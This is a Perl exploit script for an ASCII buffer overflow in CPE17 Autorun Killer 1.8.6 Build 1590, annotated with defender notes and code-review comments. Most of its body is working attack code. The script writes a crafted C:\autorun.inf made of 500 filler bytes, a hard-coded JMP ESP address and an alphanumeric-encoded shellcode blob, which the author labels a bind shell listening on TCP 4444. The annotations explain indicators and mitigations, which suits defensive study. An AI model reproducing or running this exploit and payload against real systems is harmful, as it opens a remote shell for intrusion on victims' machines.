Exploit for an ASCII buffer overflow in CPE17 Autorun Killer, affecting version 1.8.6 Build 1590. The Perl script below writes a crafted autorun.inf file.
45ab5709f7ce5a9b5b68d340ae0ccc07940d06d214a49b66c1a95d74abcfd8e6
# Exploit Title: CPE17 Autorun Killer - ASCII Buffer Overflow Exploit
# Date: 01/10/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link: http://download.thaiware.com/program15/cpe17antiautorun1590.rar
# Version: v.1.8.6 Build 1590
# Tested on: Windows XP SP3
# -------------------------------------------------------
# Bug found by Trackerx90
# -------------------------------------------------------
# Purpose: builds a single crafted autorun.inf and writes it to the root of C:.
# The file content is: filler + one 4-byte address + an encoded payload.
# Presumably the overflow is triggered when the affected tool parses this
# file; the parsing side is not shown in this script.
#
# Defender notes:
#   - The written file starts with a long run of 'A' bytes instead of an INI
#     section header, so it is easy to tell apart from a legitimate
#     autorun.inf by content and by size.
#   - The author labels the payload as a bind shell on TCP 4444; an unexpected
#     listener on that port is the matching host/network indicator.
#   - The approach depends on a hard-coded module address and on executing
#     code from the overflowed buffer; ASLR and DEP are the standard
#     mitigations against those two assumptions.
#   - The page names no fixed version; confirm remediation with the vendor.
#
# NOTE(review): the script runs without `use strict; use warnings;` and every
# variable below is an undeclared package global.

# Output path: autorun.inf in the root of drive C:.
$file= "C:\\autorun.inf";
print "\n[+] Creating the evil file: $file...\n";
# 500 bytes of 0x41 ('A') used as filler. Presumably 500 is the distance to
# the overwritten return address in the target; the script does not show how
# the value was derived.
$junk = "\x41" x 500;
# pack('V', ...) emits the value as 4 bytes, little-endian. The address is
# fixed, so per the author's note it is only meaningful on the Windows XP SP3
# build of user32.dll that was tested.
$ret = pack('V',0x7e49227c); # JMP ESP - Windows XP SP3 [user32.dll]
# Author's label for the payload: windows/shell_bind_tcp
# Author's label for the listener: PORT = 4444
# The blob consists only of letters and digits, consistent with the "ASCII"
# in the exploit title. Its decoded behaviour is taken from the author's
# labels above and is not verified here.
$shellcode =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIkLjHoywpgpePsPK".
"9zEtqIBqtNkV2vPNkRr6lnksb4TnksBVHDOnWrjWV01io01YPnL5lPa1leRvLQ0O1HO".
"fmC18GM2xpF2bwlKPR20NkCrUlVaXPlKQPd8K5iPadBjC1zpf0nk78UHNkf8a0gqkcj".
"CWLbilKwDLKgqJveaIoUaYPLlYQZovms1hG4x9p1el4wsCMJXEkCM5tcEhbchlKchet".
"7qICRFNkvlpKlKV8WleQKcLKtDlKwqhPNiqT4dtdSkCk1q1I1JBqYo9p2xSoBznkeBx".
"klFCm3XvSebGpePcXqg1cgB1OpT58rlsGDfDG9oxU88Z05QWpePTiO4v4pPbHWYopbK".
"EP9oyE2p0PpPpPG0V0W0pPaxxj6oYOM0yoYEniZgua9K1C58grc0FqqLniZF1zDPcfR".
"w3XkrKktwU7io8UPSqGE8X7JIvXkOKOXUccCcv7rHD4JLwKkQkOzu67oyHGPhaePnrm".
"3QIoN5e83SRMU45PnizCbwBw1GvQJVqzr22y1FZBkM56Kw0DEtUlc1C1lMRd5t4PYVC".
"0aTSd2pQFv6RvW60VRnf60VCcBv0ht98LWOk6YokeLIKPpNf61VIoP0bHGxMWWmapkO".
"zumk8pNUlbPVphmvNuoMmMkON5elWvsLtJk0KK9pT5s5mkPGdSRRrO0jC0bsioXUAA";
# Final file content, in order: filler, 4-byte address, encoded payload.
$payload = $junk.$ret.$shellcode;
# NOTE(review): two-argument open with the mode embedded in the string. It is
# harmless here only because $file is a constant; three-argument open with a
# lexical handle is the safe form. '>' truncates any existing C:\autorun.inf.
open($FILE,">$file") || die "[-] Error: $!\n";
print $FILE $payload;
# NOTE(review): the result of close is not checked, so a failed write could
# still be followed by the success message below.
close($FILE);
print "[+] The '$file' created successfully!\n";
--
mr.pr0n (@_pr0n_)
http://ghostinthelab.wordpress.com